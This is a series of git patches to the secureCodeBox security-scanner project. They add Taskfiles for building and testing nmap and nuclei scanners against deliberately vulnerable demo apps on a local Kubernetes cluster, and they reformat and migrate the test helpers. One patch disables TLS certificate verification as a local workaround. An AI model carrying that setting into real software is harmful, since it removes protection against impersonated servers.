--set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-$(name)" \ - --set="parser.image.tag=$(IMG_TAG)" kubectl apply -f ./integration-tests/automation-framework-configMap.yaml -n integration-tests - cd $(SCANNERS_DIR) && npm ci && cd $(scanner)/integration-tests && npm run test:integration -- $(scanner)/integration-tests From 2fd7034fa9c066158cdc7c6570bf19a6aaaa0a8b Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 23 Jun 2025 23:09:10 +0200 Subject: [PATCH 033/137] Taskfile tests Signed-off-by: Jannik Hollenbach --- .gitignore | 3 + Taskfile.yaml | 38 ++++++++++++ demo-targets/Taskfile.yaml | 67 ++++++++++++++++++++ scanners/Taskfile.yaml | 113 ++++++++++++++++++++++++++++++++++ scanners/nmap/Taskfile.yaml | 15 +++++ scanners/nuclei/Taskfile.yaml | 11 ++++ 6 files changed, 247 insertions(+) create mode 100644 Taskfile.yaml create mode 100644 demo-targets/Taskfile.yaml create mode 100644 scanners/Taskfile.yaml create mode 100644 scanners/nmap/Taskfile.yaml create mode 100644 scanners/nuclei/Taskfile.yaml diff --git a/.gitignore b/.gitignore index 319b8baa31..5fb27ddee0 100644 --- a/.gitignore +++ b/.gitignore @@ -71,3 +71,6 @@ documentation/static/findings documentation/.author_meta **/node_modules/ + +# we still use package-lock.json from node as we still use node for our acutal production containers +bun.lock \ No newline at end of file diff --git a/Taskfile.yaml b/Taskfile.yaml new file mode 100644 index 0000000000..e0ee3024e8 --- /dev/null +++ b/Taskfile.yaml @@ -0,0 +1,38 @@ +version: "3" + +env: + IMG_NS: securecodebox + +tasks: + prepare-testing-env: + env: + IMG_TAG: + sh: 'echo "sha-$(git rev-parse --short HEAD)"' + cmds: + - 'echo "Deleting existing kind cluster for testing environment"' + - kind delete cluster --name testing-env || true + - 'echo "Starting kind cluster for testing environment"' + - kind create cluster --name testing-env + - 'echo "Building images for operator and lurker with tag ${IMG_TAG}"' + - cd operator/ && docker build -t ${IMG_NS}/operator:${IMG_TAG} . + - cd lurker/ && docker build -t ${IMG_NS}/lurker:${IMG_TAG} . + - kind load docker-image ${IMG_NS}/operator:${IMG_TAG} --name testing-env + - kind load docker-image ${IMG_NS}/lurker:${IMG_TAG} --name testing-env + - 'echo "Deploying secureCodeBox operator to the testing environment"' + - kubectl config use-context kind-testing-env + - kubectl create namespace integration-tests || true + - kubectl create namespace securecodebox-system || true + - | + helm -n securecodebox-system upgrade --install securecodebox-operator ./operator --wait \ + --set="image.repository=docker.io/${IMG_NS}/operator" \ + --set="image.tag=${IMG_TAG}" \ + --set="image.pullPolicy=IfNotPresent" \ + --set="lurker.image.repository=docker.io/${IMG_NS}/lurker" \ + --set="lurker.image.tag=${IMG_TAG}" \ + --set="lurker.image.pullPolicy=IfNotPresent" + - | + echo "Building parser-sdk images with tag ${IMG_TAG}" + docker build -t securecodebox/parser-sdk-nodejs:${IMG_TAG} ./parser-sdk/nodejs + - | + echo "Building hook-sdk images with tag ${IMG_TAG}" + docker build -t securecodebox/hook-sdk-nodejs:${IMG_TAG} ./hook-sdk/nodejs diff --git a/demo-targets/Taskfile.yaml b/demo-targets/Taskfile.yaml new file mode 100644 index 0000000000..b2e0d2f1d6 --- /dev/null +++ b/demo-targets/Taskfile.yaml @@ -0,0 +1,67 @@ +version: "3" + +tasks: + deploy:app: + internal: true + cmds: + - helm --namespace demo-targets upgrade --create-namespace --install {{ .app }} {{ .TASKFILE_DIR }}/{{ .app }}/ --wait + + deploy:bodgeit: + cmd: + task: deploy:app + vars: + app: bodgeit + + deploy:dummy-ssh: + cmd: + task: deploy:app + vars: + app: dummy-ssh + + deploy:http-webhook: + cmd: + task: deploy:app + vars: + app: http-webhook + + deploy:juice-shop: + cmd: + task: deploy:app + vars: + app: juice-shop + + deploy:old-joomla: + cmd: + task: deploy:app + vars: + app: old-joomla + + deploy:old-typo3: + cmd: + task: deploy:app + vars: + app: old-typo3 + + deploy:old-wordpress: + cmd: + task: deploy:app + vars: + app: old-wordpress + + deploy:swagger-petstore: + cmd: + task: deploy:app + vars: + app: swagger-petstore + + deploy:unsafe-https: + cmd: + task: deploy:app + vars: + app: unsafe-https + + deploy:vulnerable-log4j: + cmd: + task: deploy:app + vars: + app: vulnerable-log4j diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml new file mode 100644 index 0000000000..e3acd5ebdb --- /dev/null +++ b/scanners/Taskfile.yaml @@ -0,0 +1,113 @@ +version: "3" + +includes: + demo-apps: + taskfile: ../demo-targets/Taskfile.yaml + internal: true + +vars: + demoAppsRequiredForIntegrationTests: '{{ .demoAppsRequiredForIntegrationTests | default "" }}' + hasCustomScanner: + sh: 'if [ -d "{{ .ROOT_DIR }}/scanner/" ]; then echo "true"; else echo "false"; fi' +env: + IMG_TAG: + sh: 'echo "sha-$(git rev-parse --short HEAD)"' + +tasks: + build: + desc: Build the Docker image for the {{ .scannerName }} scanner + cmds: + - | + # if the folder has a scanner/ dir assuming it is a custom scanner + if [ -d "{{ .ROOT_DIR }}/scanner/" ]; then + echo "Building custom scanner image for {{ .scannerName }} with tag ${IMG_TAG}" + docker build -t docker.io/securecodebox/scanner-{{ .scannerName }}:${IMG_TAG} \ + --build-arg=scannerVersion=$(yq eval .appVersion {{ .ROOT_DIR }}/Chart.yaml) \ + --build-arg=baseImageTag=${IMG_TAG} \ + {{ .ROOT_DIR }}/scanner/ + kind load docker-image --name testing-env docker.io/securecodebox/scanner-{{ .scannerName }}:${IMG_TAG} + else + echo "No custom scanner image defined, assuming scanner doen't need to be build" + fi + - | + echo "Building parser image for {{ .scannerName }} with tag ${IMG_TAG}" + docker build -t docker.io/securecodebox/parser-{{ .scannerName }}:${IMG_TAG} \ + --build-arg=baseImageTag=${IMG_TAG} \ + {{ .ROOT_DIR }}/parser/ + kind load docker-image --name testing-env docker.io/securecodebox/parser-{{ .scannerName }}:${IMG_TAG} + deploy: + desc: Deploy the {{ .scannerName }} scanner to the testing environment + cmds: + - 'echo "Deploying {{ .scannerName }} to the testing environment"' + - | + helm upgrade --install {{ .scannerName }} {{ .ROOT_DIR }} --namespace integration-tests \ + {{ if eq "true" .hasCustomScanner -}} + --set="scanner.image.tag=${IMG_TAG}" \ + --set="scanner.image.pullPolicy=Never" \ + {{ else -}} + --set="scanner.image.repository=securecodebox/scanner-nuclei-precooked" \ + --set="scanner.image.tag=v3.4.2-2025-06-02" \ + --set="scanner.image.pullPolicy=IfNotPresent" \ + {{ end -}} + --set="parser.image.tag=${IMG_TAG}" \ + --set="parser.image.pullPolicy=Never" \ + --set="nucleiTemplateCache.enabled=false" \ + --wait + test:setup: + desc: Installs all the various dependencies needed to run the tests for the {{ .scannerName }} scanner + cmds: + - cd {{ .ROOT_DIR }}/../../parser-sdk/nodejs/ && bun install + - cd {{ .ROOT_DIR }}/../ && bun install + - cd {{ .ROOT_DIR }}/../../tests/integration/ && bun install + - | + if [ -f {{ .ROOT_DIR }}/parser/package.json ]; then + echo "Installing parser dependencies for {{ .scannerName }}" + cd {{ .ROOT_DIR }}/parser/ && bun install + else + echo "No parser dependencies found for {{ .scannerName }}" + fi + silent: true + test:unit: + desc: Run unit tests for the {{ .scannerName }} scanner + preconditions: + - msg: "parser-sdk dependencies are not installed, run 'task test:setup' first" + sh: "[ -d {{ .ROOT_DIR }}/../../parser-sdk/nodejs/node_modules ]" + - msg: "integration-tests dependencies are not installed, run 'task test:setup' first" + sh: "[ -d {{ .ROOT_DIR }}/../../tests/integration/node_modules ]" + - msg: "scanner dependencies are not installed, run 'task test:setup' first" + sh: "[ -d {{ .ROOT_DIR }}/../node_modules ]" + cmds: + - | + echo "Running integration tests for {{ .scannerName }}" + bun test {{ .ROOT_DIR }}/parser/ + test:integration: + desc: Run integration tests for the {{ .scannerName }} scanner + preconditions: + - msg: "parser-sdk dependencies are not installed, run 'task test:setup' first" + sh: "[ -d {{ .ROOT_DIR }}/../../parser-sdk/nodejs/node_modules ]" + - msg: "integration-tests dependencies are not installed, run 'task test:setup' first" + sh: "[ -d {{ .ROOT_DIR }}/../../tests/integration/node_modules ]" + - msg: "scanner dependencies are not installed, run 'task test:setup' first" + sh: "[ -d {{ .ROOT_DIR }}/../node_modules ]" + - msg: "kind cluster is not running, run 'task prepare-testing-env' from project root dir first" + sh: "kubectl config get-contexts | grep -q 'kind-testing-env' || false" + - msg: "secureCodeBox operator is not deployed, run 'task prepare-testing-env' from project root dir first" + sh: "kubectl get pods -n securecodebox-system | grep -q 'securecodebox-operator' || false" + - msg: "{{ .scannerName }} scan type is not deployed, run 'task build deploy' from scanner dir first" + sh: "kubectl get scantypes {{ .scannerName }} -n integration-tests | grep -q '{{ .scannerName }}' || false" + env: + # Workaround for https://github.com/oven-sh/bun/issues/7332 + # not great, but this is a local connection to the kind cluster + NODE_TLS_REJECT_UNAUTHORIZED: 0 + cmds: + - 'echo "Deploying demo applications required for integration tests for {{ .scannerName }}: {{ .demoAppsRequiredForIntegrationTests }}"' + - for: + var: demoAppsRequiredForIntegrationTests + task: demo-apps:deploy:{{ .ITEM }} + - echo "Running integration tests for {{ .scannerName }}" + - bun test {{ .ROOT_DIR }}/integration-tests/ + test: + desc: Run all tests for the {{ .scannerName }} scanner + cmds: + - task test:unit + - task test:integration diff --git a/scanners/nmap/Taskfile.yaml b/scanners/nmap/Taskfile.yaml new file mode 100644 index 0000000000..b355b9e871 --- /dev/null +++ b/scanners/nmap/Taskfile.yaml @@ -0,0 +1,15 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: nmap + +tasks: + default: + desc: Build the Docker image for the Nmap scanner + cmds: + - docker build -t securecodebox/nmap:${IMG_TAG} . + silent: true diff --git a/scanners/nuclei/Taskfile.yaml b/scanners/nuclei/Taskfile.yaml new file mode 100644 index 0000000000..9c0e9b1a87 --- /dev/null +++ b/scanners/nuclei/Taskfile.yaml @@ -0,0 +1,11 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: nuclei + demoAppsRequiredForIntegrationTests: "bodgeit" + +tasks: {} From 46902e0566041cbea304612052aee84bf0bbd13b Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Tue, 24 Jun 2025 11:21:33 +0200 Subject: [PATCH 034/137] Reformat w/ prettier Signed-off-by: Jannik Hollenbach --- .../generic/findings-validation.test.js | 6 +- .../generic/no-scan-definition-error.test.js | 8 +- .../generic/read-only-hook.test.js | 6 +- .../generic/read-write-hook.test.js | 4 +- tests/integration/helpers.js | 98 ++++++++++------ tests/integration/helpers.test.js | 107 ++++++++++-------- .../hooks/finding-post-processing.test.js | 4 +- tests/integration/hooks/notification.test.js | 6 +- 8 files changed, 136 insertions(+), 103 deletions(-) diff --git a/tests/integration/generic/findings-validation.test.js b/tests/integration/generic/findings-validation.test.js index a27f04582b..cd3f70f2a5 100644 --- a/tests/integration/generic/findings-validation.test.js +++ b/tests/integration/generic/findings-validation.test.js @@ -11,10 +11,10 @@ test( async () => { await expect( // passing hello-world as args, as at least one parameter is required - scan("invalid-findings-test-scan", "test-scan", ["hello-world"], 90) + scan("invalid-findings-test-scan", "test-scan", ["hello-world"], 90), ).rejects.toThrow( - `Scan failed with description "Failed to run the Parser. This is likely a Bug, we would like to know about. Please open up a Issue on GitHub."` + `Scan failed with description "Failed to run the Parser. This is likely a Bug, we would like to know about. Please open up a Issue on GitHub."`, ); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/tests/integration/generic/no-scan-definition-error.test.js b/tests/integration/generic/no-scan-definition-error.test.js index c24fd34687..fff3570165 100644 --- a/tests/integration/generic/no-scan-definition-error.test.js +++ b/tests/integration/generic/no-scan-definition-error.test.js @@ -14,11 +14,11 @@ test( "scan-type-not-found", "this-type-does-not-exists", ["hello-world"], - 30 - ) + 30, + ), ).rejects.toThrow( - `Scan failed with description "Configured ScanType 'this-type-does-not-exists' not found in 'integration-tests' namespace. You'll likely need to deploy the ScanType."` + `Scan failed with description "Configured ScanType 'this-type-does-not-exists' not found in 'integration-tests' namespace. You'll likely need to deploy the ScanType."`, ); }, - 1 * 60 * 1000 + 1 * 60 * 1000, ); diff --git a/tests/integration/generic/read-only-hook.test.js b/tests/integration/generic/read-only-hook.test.js index 20f4ff9375..2554341681 100644 --- a/tests/integration/generic/read-only-hook.test.js +++ b/tests/integration/generic/read-only-hook.test.js @@ -46,7 +46,7 @@ test( expect(result).toBe(true); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); async function isHookTriggered(params) { @@ -55,7 +55,7 @@ async function isHookTriggered(params) { params.podName, params.namespace, params.containerName, - false + false, ); return containerLog.body.includes("/hallo-welt"); } @@ -67,7 +67,7 @@ async function delayedRepeat( fun, functionParamObject, intervalInMs, - maxRetries + maxRetries, ) { for (let i = 0; i < maxRetries; i++) { const condition = await fun(functionParamObject); diff --git a/tests/integration/generic/read-write-hook.test.js b/tests/integration/generic/read-write-hook.test.js index 0529edb848..d3275ffbc3 100644 --- a/tests/integration/generic/read-write-hook.test.js +++ b/tests/integration/generic/read-write-hook.test.js @@ -13,7 +13,7 @@ test( "test-scan-read-write-hook", "test-scan", ["hello-world"], - 90 + 90, ); expect(count).toBe(2); @@ -30,5 +30,5 @@ test( } `); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/tests/integration/helpers.js b/tests/integration/helpers.js index 5eabca031c..e86f517ed3 100644 --- a/tests/integration/helpers.js +++ b/tests/integration/helpers.js @@ -33,18 +33,19 @@ async function deleteScan(name, k8sApis = getKubernetesAPIs()) { namespace, "scans", name, - {} + {}, ); } async function getScan(name, k8sApis = getKubernetesAPIs()) { - const { body: scan } = await k8sApis.k8sCRDApi.getNamespacedCustomObjectStatus( - "execution.securecodebox.io", - "v1", - namespace, - "scans", - name - ); + const { body: scan } = + await k8sApis.k8sCRDApi.getNamespacedCustomObjectStatus( + "execution.securecodebox.io", + "v1", + namespace, + "scans", + name, + ); return scan; } @@ -58,7 +59,7 @@ async function displayAllLogsForJob(jobName, k8sApis = getKubernetesAPIs()) { undefined, undefined, undefined, - `job-name=${jobName}` + `job-name=${jobName}`, ); if (pods.length === 0) { @@ -67,7 +68,7 @@ async function displayAllLogsForJob(jobName, k8sApis = getKubernetesAPIs()) { for (const pod of pods) { console.log( - `Listing logs for Job '${jobName}' > Pod '${pod.metadata.name}':` + `Listing logs for Job '${jobName}' > Pod '${pod.metadata.name}':`, ); for (const container of pod.spec.containers) { @@ -75,13 +76,13 @@ async function displayAllLogsForJob(jobName, k8sApis = getKubernetesAPIs()) { const response = await k8sApis.k8sPodsApi.readNamespacedPodLog( pod.metadata.name, namespace, - container.name + container.name, ); console.log(`Container ${container.name}:`); console.log(response.body); } catch (exception) { console.error( - `Failed to display logs of container ${container.name}: ${exception.body.message}` + `Failed to display logs of container ${container.name}: ${exception.body.message}`, ); } } @@ -90,7 +91,8 @@ async function displayAllLogsForJob(jobName, k8sApis = getKubernetesAPIs()) { async function logJobs(k8sApis = getKubernetesAPIs()) { try { - const { body: jobs } = await k8sApis.k8sBatchApi.listNamespacedJob(namespace); + const { body: jobs } = + await k8sApis.k8sBatchApi.listNamespacedJob(namespace); console.log("Logging spec & status of jobs in namespace"); @@ -129,9 +131,17 @@ async function disasterRecovery(scanName, k8sApis) { * @param {PodsApi} PodsApi kubernetes api client for CoreV1Api. Optional, will be created if not provided. * @returns {scan.findings} returns findings { categories, severities, count } */ -async function scan(name, scanType, parameters = [], timeout = 180, volumes = [], volumeMounts = [], - initContainers = [], k8sApis = getKubernetesAPIs()) { - namespace = "integration-tests" +async function scan( + name, + scanType, + parameters = [], + timeout = 180, + volumes = [], + volumeMounts = [], + initContainers = [], + k8sApis = getKubernetesAPIs(), +) { + namespace = "integration-tests"; const scanDefinition = { apiVersion: "execution.securecodebox.io/v1", kind: "Scan", @@ -152,7 +162,7 @@ async function scan(name, scanType, parameters = [], timeout = 180, volumes = [] "v1", namespace, "scans", - scanDefinition + scanDefinition, ); const actualName = body.metadata.name; @@ -172,7 +182,7 @@ async function scan(name, scanType, parameters = [], timeout = 180, volumes = [] await disasterRecovery(actualName, k8sApis); throw new Error( - `Scan failed with description "${status.errorDescription}"` + `Scan failed with description "${status.errorDescription}"`, ); } } @@ -193,10 +203,17 @@ async function scan(name, scanType, parameters = [], timeout = 180, volumes = [] * @param {CRDApi} CRDApi kubernetes api client for CRDs. Optional, will be created if not provided. * @param {BatchApi} BatchApi kubernetes api client for BatchV1Api. Optional, will be created if not provided. * @param {PodsApi} PodsApi kubernetes api client for CoreV1Api. Optional, will be created if not provided. - * + * * @returns {scan.findings} returns findings { categories, severities, count } */ -async function cascadingScan(name, scanType, parameters = [], { nameCascade, matchLabels }, timeout = 180, k8sApis = getKubernetesAPIs()) { +async function cascadingScan( + name, + scanType, + parameters = [], + { nameCascade, matchLabels }, + timeout = 180, + k8sApis = getKubernetesAPIs(), +) { const scanDefinition = { apiVersion: "execution.securecodebox.io/v1", kind: "Scan", @@ -209,16 +226,16 @@ async function cascadingScan(name, scanType, parameters = [], { nameCascade, mat parameters, cascades: { matchLabels, - } + }, }, }; - + const { body } = await k8sApis.k8sCRDApi.createNamespacedCustomObject( "execution.securecodebox.io", "v1", namespace, "scans", - scanDefinition + scanDefinition, ); const actualName = body.metadata.name; @@ -230,22 +247,20 @@ async function cascadingScan(name, scanType, parameters = [], { nameCascade, mat if (status && status.state === "Done") { // Wait a couple seconds to give kubernetes more time to update the fields await sleep(5); - console.log("First Scan finished") - console.log(`First Scan Status: ${JSON.stringify(status, undefined, 2)}`) + console.log("First Scan finished"); + console.log(`First Scan Status: ${JSON.stringify(status, undefined, 2)}`); break; } else if (status && status.state === "Errored") { console.error("Scan Errored"); await disasterRecovery(actualName, k8sApis); throw new Error( - `Initial Scan failed with description "${status.errorDescription}"` + `Initial Scan failed with description "${status.errorDescription}"`, ); } - if (i === (timeout - 1)) { - throw new Error( - `Initial Scan timed out failed` - ); + if (i === timeout - 1) { + throw new Error(`Initial Scan timed out failed`); } } @@ -253,31 +268,40 @@ async function cascadingScan(name, scanType, parameters = [], { nameCascade, mat "execution.securecodebox.io", "v1", namespace, - "scans" + "scans", ); let cascadedScan = null; for (const scan of scans.items) { - if (scan.metadata.annotations && scan.metadata.annotations["cascading.securecodebox.io/chain"] === nameCascade) { + if ( + scan.metadata.annotations && + scan.metadata.annotations["cascading.securecodebox.io/chain"] === + nameCascade + ) { cascadedScan = scan; break; } } if (cascadedScan === null) { - console.warn(`Didn't find matching cascaded scan in available scans: ${JSON.stringify(scans.items, undefined, 2)}`) - throw new Error(`Didn't find cascaded Scan for ${nameCascade}`) + console.warn( + `Didn't find matching cascaded scan in available scans: ${JSON.stringify(scans.items, undefined, 2)}`, + ); + throw new Error(`Didn't find cascaded Scan for ${nameCascade}`); } const actualNameCascade = cascadedScan.metadata.name; for (let j = 0; j < timeout; j++) { - await sleep(1) + await sleep(1); const { status: statusCascade } = await getScan(actualNameCascade, k8sApis); if (statusCascade && statusCascade.state === "Done") { await sleep(2); - const { status: statusCascade } = await getScan(actualNameCascade, k8sApis); + const { status: statusCascade } = await getScan( + actualNameCascade, + k8sApis, + ); await deleteScan(actualName, k8sApis); await deleteScan(actualNameCascade, k8sApis); @@ -287,7 +311,7 @@ async function cascadingScan(name, scanType, parameters = [], { nameCascade, mat await disasterRecovery(actualName, k8sApis); await disasterRecovery(actualNameCascade, k8sApis); throw new Error( - `Cascade Scan failed with description "${statusCascade.errorDescription}"` + `Cascade Scan failed with description "${statusCascade.errorDescription}"`, ); } } diff --git a/tests/integration/helpers.test.js b/tests/integration/helpers.test.js index cb70f51d8c..4275d39126 100644 --- a/tests/integration/helpers.test.js +++ b/tests/integration/helpers.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const {scan, cascadingScan} = require("./helpers"); +const { scan, cascadingScan } = require("./helpers"); jest.setTimeout(10 * 1000); @@ -33,12 +33,16 @@ describe("Kubernetes interaction tests", () => { const mockScanStatusResponse = require("./__testFiles__/mockScanStatusResponse.json"); mockK8sCRDApi.createNamespacedCustomObject.mockResolvedValue( - mockScanCreationResponse + mockScanCreationResponse, ); mockK8sCRDApi.getNamespacedCustomObjectStatus.mockResolvedValue( - mockScanStatusResponse + mockScanStatusResponse, ); - const k8sApi = { k8sCRDApi:mockK8sCRDApi, k8sBatchApi:mockK8sBatchApi, k8sPodsApi:mockPodsApi } + const k8sApi = { + k8sCRDApi: mockK8sCRDApi, + k8sBatchApi: mockK8sBatchApi, + k8sPodsApi: mockPodsApi, + }; const findings = await scan( "nmap-example", @@ -48,7 +52,7 @@ describe("Kubernetes interaction tests", () => { [], [], [], - k8sApi + k8sApi, ); expect(findings).toBeDefined(); @@ -67,35 +71,30 @@ describe("Kubernetes interaction tests", () => { const mockReadNamespacedPodLogResponse = require("./__testFiles__/mockReadNamespacedPodLogResponse.json"); mockK8sCRDApi.createNamespacedCustomObject.mockResolvedValue( - mockScanCreationResponse + mockScanCreationResponse, ); mockK8sCRDApi.getNamespacedCustomObjectStatus.mockResolvedValue( - mockScanStatusResponse_Errored + mockScanStatusResponse_Errored, ); mockK8sBatchApi.listNamespacedJob.mockResolvedValue( - mockListNamespacedJobResponse + mockListNamespacedJobResponse, ); mockPodsApi.listNamespacedPod.mockResolvedValue( - mockListNamespacedPodResponse + mockListNamespacedPodResponse, ); mockPodsApi.readNamespacedPodLog.mockResolvedValue( - mockReadNamespacedPodLogResponse + mockReadNamespacedPodLogResponse, ); + const k8sApi = { + k8sCRDApi: mockK8sCRDApi, + k8sBatchApi: mockK8sBatchApi, + k8sPodsApi: mockPodsApi, + }; - const k8sApi = { k8sCRDApi:mockK8sCRDApi, k8sBatchApi:mockK8sBatchApi, k8sPodsApi:mockPodsApi } - - return expect(scan( - "nmap-example", - "nmap", - [], - 180, - [], - [], - [], - k8sApi - )).rejects.toThrow('Scan failed with description "Mocked Error"'); - + return expect( + scan("nmap-example", "nmap", [], 180, [], [], [], k8sApi), + ).rejects.toThrow('Scan failed with description "Mocked Error"'); }); }); @@ -106,17 +105,21 @@ describe("Kubernetes interaction tests", () => { const mockListNamespacedCustomObjectResponse = require("./__testFiles__/mockCascadingListNamespacedCustomObject.json"); mockK8sCRDApi.createNamespacedCustomObject.mockResolvedValue( - mockScanCreationResponse + mockScanCreationResponse, ); mockK8sCRDApi.getNamespacedCustomObjectStatus.mockResolvedValue( - mockScanStatusResponse + mockScanStatusResponse, ); mockK8sCRDApi.listNamespacedCustomObject.mockResolvedValue( - mockListNamespacedCustomObjectResponse + mockListNamespacedCustomObjectResponse, ); - const k8sApi = { k8sCRDApi:mockK8sCRDApi, k8sBatchApi:mockK8sBatchApi, k8sPodsApi:mockPodsApi } + const k8sApi = { + k8sCRDApi: mockK8sCRDApi, + k8sBatchApi: mockK8sBatchApi, + k8sPodsApi: mockPodsApi, + }; const findings = await cascadingScan( "nmap-dummy-ssh", @@ -130,7 +133,7 @@ describe("Kubernetes interaction tests", () => { }, }, 180, - k8sApi + k8sApi, ); expect(findings).toBeDefined(); @@ -146,36 +149,42 @@ describe("Kubernetes interaction tests", () => { const mockReadNamespacedPodLogResponse = require("./__testFiles__/mockReadNamespacedPodLogResponse.json"); mockK8sCRDApi.createNamespacedCustomObject.mockResolvedValue( - mockScanCreationResponse + mockScanCreationResponse, ); mockK8sCRDApi.getNamespacedCustomObjectStatus.mockResolvedValue( - mockScanStatusResponse_Errored + mockScanStatusResponse_Errored, ); mockK8sBatchApi.listNamespacedJob.mockResolvedValue( - mockListNamespacedJobResponse + mockListNamespacedJobResponse, ); mockPodsApi.listNamespacedPod.mockResolvedValue( - mockListNamespacedPodResponse + mockListNamespacedPodResponse, ); mockPodsApi.readNamespacedPodLog.mockResolvedValue( - mockReadNamespacedPodLogResponse - ); - const k8sApi = { k8sCRDApi:mockK8sCRDApi, k8sBatchApi:mockK8sBatchApi, k8sPodsApi:mockPodsApi } - - return expect(cascadingScan( - "nmap-dummy-ssh", - "nmap", - ["-Pn", "-sV", "dummy-ssh.demo-targets.svc"], - { - nameCascade: "ncrack-ssh", - matchLabels: { - "securecodebox.io/invasive": "invasive", - "securecodebox.io/intensive": "high", + mockReadNamespacedPodLogResponse, + ); + const k8sApi = { + k8sCRDApi: mockK8sCRDApi, + k8sBatchApi: mockK8sBatchApi, + k8sPodsApi: mockPodsApi, + }; + + return expect( + cascadingScan( + "nmap-dummy-ssh", + "nmap", + ["-Pn", "-sV", "dummy-ssh.demo-targets.svc"], + { + nameCascade: "ncrack-ssh", + matchLabels: { + "securecodebox.io/invasive": "invasive", + "securecodebox.io/intensive": "high", + }, }, - }, - 180, - k8sApi - )).rejects.toThrow('Initial Scan failed with description "Mocked Error"'); + 180, + k8sApi, + ), + ).rejects.toThrow('Initial Scan failed with description "Mocked Error"'); }); }); }); diff --git a/tests/integration/hooks/finding-post-processing.test.js b/tests/integration/hooks/finding-post-processing.test.js index 8cebdd885b..d31e0b007c 100644 --- a/tests/integration/hooks/finding-post-processing.test.js +++ b/tests/integration/hooks/finding-post-processing.test.js @@ -13,11 +13,11 @@ test( "finding-post-processing", "test-scan", [], - 90 + 90, ); expect(count).toBe(2); expect(severities.high).toBe(1); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/tests/integration/hooks/notification.test.js b/tests/integration/hooks/notification.test.js index 26fdce0957..fefe51674c 100644 --- a/tests/integration/hooks/notification.test.js +++ b/tests/integration/hooks/notification.test.js @@ -46,7 +46,7 @@ test( expect(result).toBe(true); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); async function isHookTriggered(params) { @@ -55,7 +55,7 @@ async function isHookTriggered(params) { params.podName, params.namespace, params.containerName, - false + false, ); return containerLog.body.includes("/slack-notification"); } @@ -67,7 +67,7 @@ async function delayedRepeat( fun, functionParamObject, intervalInMs, - maxRetries + maxRetries, ) { for (let i = 0; i < maxRetries; i++) { const condition = await fun(functionParamObject); From d2e7c4a0bfbd7e071944506b6d996a304a58a6f7 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Sun, 29 Jun 2025 20:43:02 +0200 Subject: [PATCH 035/137] Migrate test/integration to new k8s client verion and cleanup tests Signed-off-by: Jannik Hollenbach --- scanners/Taskfile.yaml | 16 +- .../__snapshots__/helpers.test.js.snap | 89 - .../helpers.test.js.snap.license | 3 - ...ckCascadingListNamespacedCustomObject.json | 716 ++-- .../mockCascadingScanCreationResponse.json | 134 +- .../mockCascadingScanStatusResponse.json | 382 +- ...ckCascadingScanStatusResponse_Errored.json | 384 +- .../mockListNamespacedJobResponse.json | 18 +- .../mockListNamespacedPodResponse.json | 64 +- .../mockReadNamespacedPodLogResponse.json | 7 +- .../mockScanCreationResponse.json | 88 +- .../__testFiles__/mockScanStatusResponse.json | 158 +- .../mockScanStatusResponse_Errored.json | 148 +- tests/integration/helpers.test.js | 80 +- tests/integration/{helpers.js => helpers.ts} | 185 +- tests/integration/package-lock.json | 3099 +++++++++-------- tests/integration/package.json | 15 +- 17 files changed, 2956 insertions(+), 2630 deletions(-) delete mode 100644 tests/integration/__snapshots__/helpers.test.js.snap delete mode 100644 tests/integration/__snapshots__/helpers.test.js.snap.license rename tests/integration/{helpers.js => helpers.ts} (72%) diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml index e3acd5ebdb..b755a6c63f 100644 --- a/scanners/Taskfile.yaml +++ b/scanners/Taskfile.yaml @@ -95,15 +95,23 @@ tasks: sh: "kubectl get pods -n securecodebox-system | grep -q 'securecodebox-operator' || false" - msg: "{{ .scannerName }} scan type is not deployed, run 'task build deploy' from scanner dir first" sh: "kubectl get scantypes {{ .scannerName }} -n integration-tests | grep -q '{{ .scannerName }}' || false" - env: - # Workaround for https://github.com/oven-sh/bun/issues/7332 - # not great, but this is a local connection to the kind cluster - NODE_TLS_REJECT_UNAUTHORIZED: 0 + cmds: - 'echo "Deploying demo applications required for integration tests for {{ .scannerName }}: {{ .demoAppsRequiredForIntegrationTests }}"' - for: var: demoAppsRequiredForIntegrationTests task: demo-apps:deploy:{{ .ITEM }} + + # Workaround for https://github.com/oven-sh/bun/issues/7332 + - 'echo "Forwarding the Kubernetes API to localhost"' + - kubectl proxy >/dev/null 2>&1 & + - sleep 1 # Wait a bit to ensure the proxy is up + + - defer: | + # kill pid with command "kubectl proxy" + echo "Killing kubectl proxy" + pkill -f "kubectl proxy" + - echo "Running integration tests for {{ .scannerName }}" - bun test {{ .ROOT_DIR }}/integration-tests/ test: diff --git a/tests/integration/__snapshots__/helpers.test.js.snap b/tests/integration/__snapshots__/helpers.test.js.snap deleted file mode 100644 index cc1ed90764..0000000000 --- a/tests/integration/__snapshots__/helpers.test.js.snap +++ /dev/null @@ -1,89 +0,0 @@ -// Jest Snapshot v1, https://goo.gl/fbAQLP - -exports[`Kubernetes interaction tests cascading scan function should create a cascading scan and return findings on successful completion 1`] = ` -{ - "categories": { - "Discovered Credentials": 1, - }, - "count": 1, - "severities": { - "high": 1, - }, -} -`; - -exports[`Kubernetes interaction tests scan function should create a scan and return findings on successful completion 1`] = ` -{ - "categories": { - "Vulnerability": 24, - }, - "count": 24, - "severities": { - "high": 24, - }, -} -`; - -exports[`Kubernetes interaction tests scan function should create a scan and return findings on successful completion 2`] = ` -[MockFunction] { - "calls": [ - [ - "execution.securecodebox.io", - "v1", - "integration-tests", - "scans", - { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "generateName": "nmap-example-", - }, - "spec": { - "initContainers": [], - "parameters": [], - "scanType": "nmap", - "volumeMounts": [], - "volumes": [], - }, - }, - ], - ], - "results": [ - { - "type": "return", - "value": Promise {}, - }, - ], 